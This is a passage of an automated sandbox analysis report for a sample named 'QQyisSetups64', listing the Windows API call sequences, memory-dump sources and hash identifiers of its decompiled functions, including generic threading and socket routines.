                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6f9eb0fab6cfb8bd2d11a254deb9c9e8556061e8f2ae0e09de9249f89460f4c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E811EEB7A4020867D725F7A4AC89FFFF76C9B85620F044126FA05EE284D635950586B2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,A:\), ref: 03788166
                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,B:\), ref: 03788176
                                                                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 037881A6
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 037881B7
                                                                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 037881CE
                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(00000AD4,?), ref: 03788204
                                                                                                                                                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 03788228
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(?,00000000), ref: 03788233
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrcmpilstrcpy$DeviceQuery__wcsnicmplstrcatlstrlen
                                                                                                                                                                                                                      • String ID: A:\$B:\
                                                                                                                                                                                                                      • API String ID: 4249875308-1009255891
                                                                                                                                                                                                                      • Opcode ID: fe8088caf2f67db320404901228d8574947eff5893dc2fa2a5eb8e9e326a2eb7
                                                                                                                                                                                                                      • Instruction ID: ddc098736af79e5cfc06a0319f4541accb98f9e9d6b5aeb9b0d00db8b26ed498
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8088caf2f67db320404901228d8574947eff5893dc2fa2a5eb8e9e326a2eb7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50119072A40218EBDB24EFA0DD44BEEB378EF84310F448498DE09B3141EB74EA05CB95
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcat_s$_memset$__localtime64__time64__wcsnicmp_malloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3592133475-0
                                                                                                                                                                                                                      • Opcode ID: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                                                                                                                                      • Instruction ID: c151847f92ad51ce4f8bd4aab095153610a7a2e9cf6cdb6e9db82f3b3157cbd4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9612d8c1e5366324d8b9188000d87f817137c3975bf1db378519ae119bbab18c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70F1A4B5900304ABD724DBA4CC85FEB77B8EF44300F44459CE71AAB281EB71AA55CF59
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free_strlen$____lc_codepage_func__getenv_helper_nolock__invoke_watson__malloc_crt_strcpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2056778627-0
                                                                                                                                                                                                                      • Opcode ID: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                                                                                                                                      • Instruction ID: f38dc8e134301dfb5caf2c1500b3e27663eac22ae4e6eea3dd99d8cece543983
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb94a165544a799f799d92d1cfaadda03cf0e03ff00a903cef25901c42debaeb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9061FA768013599FEB51EF65CD819ADFBF9EF86310B2C402EE601EF260E77188618B14
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,453DC9E3,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E,00000000), ref: 03789773
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0378E1AE,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789812
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789850
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 03789875
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 0378989A
                                                                                                                                                                                                                        • Part of subcall function 03781280: __CxxThrowException@8.LIBCMT ref: 03781290
                                                                                                                                                                                                                        • Part of subcall function 03781280: DeleteCriticalSection.KERNEL32(00000000,0378D3E6,037A6624,?,?,0378D3E6,?,?,?,?,037A5A40,00000000), ref: 037812A1
                                                                                                                                                                                                                        • Part of subcall function 0378CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0378E076,00000000,453DC9E3,0378E04E,771B2F60,00000000,?,0378E226,037A110B,000000FF,?,0378994A,0378E226), ref: 0378CE67
                                                                                                                                                                                                                        • Part of subcall function 0378CE10: InitializeCriticalSectionAndSpinCount.KERNEL32(0378E08E,00000000,?,0378E226,037A110B,000000FF,?,0378994A,0378E226,?,?,?,00000000,037A125B,000000FF), ref: 0378CE83
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(0378E066,00000000), ref: 037899A0
                                                                                                                                                                                                                      • timeGetTime.WINMM(?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 037899A6
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 037899B4
                                                                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,037A125B,000000FF,?,0378E04E), ref: 037899BD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1400036169-0
                                                                                                                                                                                                                      • Opcode ID: 99db6d04431aa650c87967c4b166e6056bf0ee47af1b6f24ff48445c9cc00499
                                                                                                                                                                                                                      • Instruction ID: 97ddfd6cc618155af7442f4c49968bf6ea5c1315d4e9ae72e1a792394307175b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99db6d04431aa650c87967c4b166e6056bf0ee47af1b6f24ff48445c9cc00499
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC81E7B0A41A46BFE344DF7AC88479AFBA8FB09314F50862ED12CD7640D775A964CF90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 03783660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03783667
                                                                                                                                                                                                                        • Part of subcall function 03783660: _free.LIBCMT ref: 0378369C
                                                                                                                                                                                                                        • Part of subcall function 03783660: _malloc.LIBCMT ref: 037836D7
                                                                                                                                                                                                                        • Part of subcall function 03783660: _memset.LIBCMT ref: 037836E5
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(037B1F0C), ref: 03783565
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(037B1F0C), ref: 03783573
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 0378359A
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 037835B3
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,?,037B1F0C), ref: 037835EE
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 03783621
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 03783639
                                                                                                                                                                                                                        • Part of subcall function 03783F60: GetCurrentThreadId.KERNEL32 ref: 03783F65
                                                                                                                                                                                                                        • Part of subcall function 03783F60: send.WS2_32(?,037A49C0,00000010,00000000), ref: 03783FC6
                                                                                                                                                                                                                        • Part of subcall function 03783F60: SetEvent.KERNEL32(?), ref: 03783FE9
                                                                                                                                                                                                                        • Part of subcall function 03783F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03783FF5
                                                                                                                                                                                                                        • Part of subcall function 03783F60: WSACloseEvent.WS2_32(?), ref: 03784003
                                                                                                                                                                                                                        • Part of subcall function 03783F60: shutdown.WS2_32(?,00000001), ref: 0378401B
                                                                                                                                                                                                                        • Part of subcall function 03783F60: closesocket.WS2_32(?), ref: 03784025
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 03783649
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 127459856-0
                                                                                                                                                                                                                      • Opcode ID: a9fc5116873563a568a026c2c25527be35476a2732e871f69d53a9a6c80ca671
                                                                                                                                                                                                                      • Instruction ID: caf9745e8fa5ba4b1bc2678dcb7446160bd783250d2e445b99767e3df538712a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9fc5116873563a568a026c2c25527be35476a2732e871f69d53a9a6c80ca671
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20419FB9640704AFE360EF6DDC81B6AB7F8FB88B11F50482EE646D7680D7B4E4048B50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 02C83660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 02C83667
                                                                                                                                                                                                                        • Part of subcall function 02C83660: _free.LIBCMT ref: 02C8369C
                                                                                                                                                                                                                        • Part of subcall function 02C83660: _malloc.LIBCMT ref: 02C836D7
                                                                                                                                                                                                                        • Part of subcall function 02C83660: _memset.LIBCMT ref: 02C836E5
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02C9D990), ref: 02C83565
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02C9D990), ref: 02C83573
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 02C8359A
                                                                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 02C835B3
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?,?,?,02C9D990), ref: 02C835EE
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 02C83621
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 02C83639
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: GetCurrentThreadId.KERNEL32 ref: 02C83F65
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: send.WS2_32(?,02C97440,00000010,00000000), ref: 02C83FC6
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: SetEvent.KERNEL32(?), ref: 02C83FE9
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C83FF5
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: WSACloseEvent.WS2_32(?), ref: 02C84003
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: shutdown.WS2_32(?,00000001), ref: 02C8401B
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: closesocket.WS2_32(?), ref: 02C84025
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 02C83649
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 127459856-0
                                                                                                                                                                                                                      • Opcode ID: eadc4fbd268ba597120fd1ff915865f2421a18eb9c1357eb153ad86c2453eca5
                                                                                                                                                                                                                      • Instruction ID: 325aaddaaba5435ceb01cf5c1604d9214d72a8cc8f4ea453855f4376967afd2c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eadc4fbd268ba597120fd1ff915865f2421a18eb9c1357eb153ad86c2453eca5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6041CEB1A00704AFD360EF69DC84B6AB7E8FB48B04F50596EE646D7680D7B0E8048F90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 03784443
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 0378444C
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 0378444E
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 0378445D
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00001770), ref: 037844AB
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 037844C8
                                                                                                                                                                                                                        • Part of subcall function 03783F60: GetCurrentThreadId.KERNEL32 ref: 03783F65
                                                                                                                                                                                                                        • Part of subcall function 03783F60: send.WS2_32(?,037A49C0,00000010,00000000), ref: 03783FC6
                                                                                                                                                                                                                        • Part of subcall function 03783F60: SetEvent.KERNEL32(?), ref: 03783FE9
                                                                                                                                                                                                                        • Part of subcall function 03783F60: InterlockedExchange.KERNEL32(?,00000000), ref: 03783FF5
                                                                                                                                                                                                                        • Part of subcall function 03783F60: WSACloseEvent.WS2_32(?), ref: 03784003
                                                                                                                                                                                                                        • Part of subcall function 03783F60: shutdown.WS2_32(?,00000001), ref: 0378401B
                                                                                                                                                                                                                        • Part of subcall function 03783F60: closesocket.WS2_32(?), ref: 03784025
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 037844DC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 542259498-0
                                                                                                                                                                                                                      • Opcode ID: 1f4e2d2aabdaf171a9f6113049dfe67c14067aaac83b31e220d86523ea43e781
                                                                                                                                                                                                                      • Instruction ID: 5a8557ab74f6cea946b598c029638ffbd6da1dc4d90e024681b0e08de571939b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1f4e2d2aabdaf171a9f6113049dfe67c14067aaac83b31e220d86523ea43e781
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3217376640B04ABC630FF79EC84B97B3E8EF89710F104A1EE58AC7640D675E401CBA1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C84443
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C8444C
                                                                                                                                                                                                                      • timeGetTime.WINMM ref: 02C8444E
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C8445D
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00001770), ref: 02C844AB
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C844C8
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: GetCurrentThreadId.KERNEL32 ref: 02C83F65
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: send.WS2_32(?,02C97440,00000010,00000000), ref: 02C83FC6
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: SetEvent.KERNEL32(?), ref: 02C83FE9
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: InterlockedExchange.KERNEL32(?,00000000), ref: 02C83FF5
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: WSACloseEvent.WS2_32(?), ref: 02C84003
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: shutdown.WS2_32(?,00000001), ref: 02C8401B
                                                                                                                                                                                                                        • Part of subcall function 02C83F60: closesocket.WS2_32(?), ref: 02C84025
                                                                                                                                                                                                                      • ResetEvent.KERNEL32(?), ref: 02C844DC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 542259498-0
                                                                                                                                                                                                                      • Opcode ID: b20656b50e44145c9894d2a4b5ef60055f0eae6fec54a5f0ac150edb803b2080
                                                                                                                                                                                                                      • Instruction ID: 8ff531238c41698bebf9d9e69fe78b87c6346211c62280c3abe431f909556714
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b20656b50e44145c9894d2a4b5ef60055f0eae6fec54a5f0ac150edb803b2080
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6218F76640704ABC630EF69EC88B97B3E8FF89714F104A1EF58AC7640D671A4108BA0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?), ref: 03784E99
                                                                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?,?), ref: 03784EB8
                                                                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?), ref: 03784EC2
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 03784ED9
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03784EE2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 03784EE9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                                                                      • Opcode ID: 1e46e22dda893e0da3d542a5ab1aa0d0c7e7fa0e034d585ad4844eb68fb4fdfb
                                                                                                                                                                                                                      • Instruction ID: bea21647c2cd6b9e49d4477ea591820c7c6959f371c6dfa6776a7be83a534e98
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e46e22dda893e0da3d542a5ab1aa0d0c7e7fa0e034d585ad4844eb68fb4fdfb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 771186327447059BD320FB7AEC8497BF3ECEF88315B04492EE606C2541D675D804C7A5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?), ref: 02C84E79
                                                                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?,?), ref: 02C84E98
                                                                                                                                                                                                                      • TryEnterCriticalSection.KERNEL32(?), ref: 02C84EA2
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 02C84EB9
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 02C84EC2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 02C84EC9
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                                                                      • Opcode ID: e66cb1396afc9665a32265688e9e4e816cd5cf0bdef76fda28de881c76eb9d70
                                                                                                                                                                                                                      • Instruction ID: 32d01f93c46d8c57ffbd65d63d754ef8d86b1e05073675fd2a5e28c2d2a919bb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e66cb1396afc9665a32265688e9e4e816cd5cf0bdef76fda28de881c76eb9d70
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F61163326043459BC330EB79AC88A6BF3DCEF88659B404A2AE605C6540D771D915CAA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 0378DD32
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 0378DE35
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                      • String ID: Main
                                                                                                                                                                                                                      • API String ID: 1452528299-521822810
                                                                                                                                                                                                                      • Opcode ID: 21cb4ea08eb0ffc60edf93beb6b3cbdd9850144658acca6c5d3c170562a989a7
                                                                                                                                                                                                                      • Instruction ID: 679d43b85722c1e4176d5092c514d8e44477e95aa77651b78790e0d5d3b8c1e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21cb4ea08eb0ffc60edf93beb6b3cbdd9850144658acca6c5d3c170562a989a7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0141E431A40205DFD720EF58D880BAAB3F4FF94314F0886AED8459B791E774E941CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 03783F65
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,771ADFA0,03783648), ref: 03784054
                                                                                                                                                                                                                        • Part of subcall function 03782BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 03782BD6
                                                                                                                                                                                                                        • Part of subcall function 03782BC0: SwitchToThread.KERNEL32 ref: 03782BEA
                                                                                                                                                                                                                      • send.WS2_32(?,037A49C0,00000010,00000000), ref: 03783FC6
                                                                                                                                                                                                                      • SetEvent.KERNEL32(?), ref: 03783FE9
                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 03783FF5
                                                                                                                                                                                                                      • WSACloseEvent.WS2_32(?), ref: 03784003
                                                                                                                                                                                                                      • shutdown.WS2_32(?,00000001), ref: 0378401B
                                                                                                                                                                                                                      • closesocket.WS2_32(?), ref: 03784025
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3254528666-0
                                                                                                                                                                                                                      • Opcode ID: d9020f6f781426970a0571350f026518a1da9a330adc5d4b351d9450deeff48a
                                                                                                                                                                                                                      • Instruction ID: 49bdd24591cfbde8bcaf1508953f976b401919324af07605ff0e34f6221db930
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d9020f6f781426970a0571350f026518a1da9a330adc5d4b351d9450deeff48a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A216D79240B019BE330EF69D88CB5BB7F5BB84B10F144D1CE69287A81D7B9E801CB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 02C83F65
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,771ADFA0,02C83648), ref: 02C84054
                                                                                                                                                                                                                        • Part of subcall function 02C82B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C82B96
